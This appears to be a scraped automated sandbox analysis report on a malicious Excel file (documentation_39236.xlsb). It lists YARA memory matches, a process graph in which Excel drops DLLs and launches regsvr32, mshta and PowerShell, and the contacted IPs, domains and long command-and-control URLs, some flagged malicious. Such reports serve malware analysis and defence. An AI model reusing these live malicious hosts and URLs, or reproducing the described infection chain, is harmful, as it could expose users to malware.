Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 445916 Sample: documentation_39236.xlsb Startdate: 08/07/2021 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 63 10 other signatures 2->63 7 EXCEL.EXE 30 41 2->7         started        12 iexplore.exe 1 59 2->12         started        14 mshta.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 53 free.mynowministries.com 162.241.253.78, 443, 49725, 49752 UNIFIEDLAYER-AS-1US United States 7->53 49 C:\Users\user\AppData\Local\...\app[1].dll, PE32 7->49 dropped 51 C:\Users\Public\Documents\decrypt.dll, PE32 7->51 dropped 69 Document exploit detected (creates forbidden files) 7->69 71 Document exploit detected (UrlDownloadToFile) 7->71 18 regsvr32.exe 7->18         started        21 regsvr32.exe 7->21         started        23 iexplore.exe 30 12->23         started        26 iexplore.exe 30 12->26         started        28 iexplore.exe 30 12->28         started        30 iexplore.exe 12->30         started        73 Suspicious powershell command line found 14->73 32 powershell.exe 14->32         started        35 iexplore.exe 31 16->35         started        37 powershell.exe 16->37         started        file5 signatures6 process7 dnsIp8 65 Writes or reads registry keys via WMI 18->65 67 Writes registry values via WMI 18->67 47 C:\Users\user\AppData\...\zctvvvtu.cmdline, UTF-8 32->47 dropped 39 conhost.exe 32->39         started        41 csc.exe 32->41         started        55 gtr.antoinfer.com 165.232.183.49, 49754, 49755, 49756 ALLEGHENYHEALTHNETWORKUS United States 35->55 43 conhost.exe 37->43         started        45 csc.exe 37->45         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.241.253.78
 free.mynowministries.com United States
46606 UNIFIEDLAYER-AS-1US false
165.232.183.49
 gtr.antoinfer.com United States
22255 ALLEGHENYHEALTHNETWORKUS true

Contacted Domains

Name IP Active
gtr.antoinfer.com 165.232.183.49 true
free.mynowministries.com 162.241.253.78 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/favicon.ico true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K true
  • Avira URL Cloud: safe
 unknown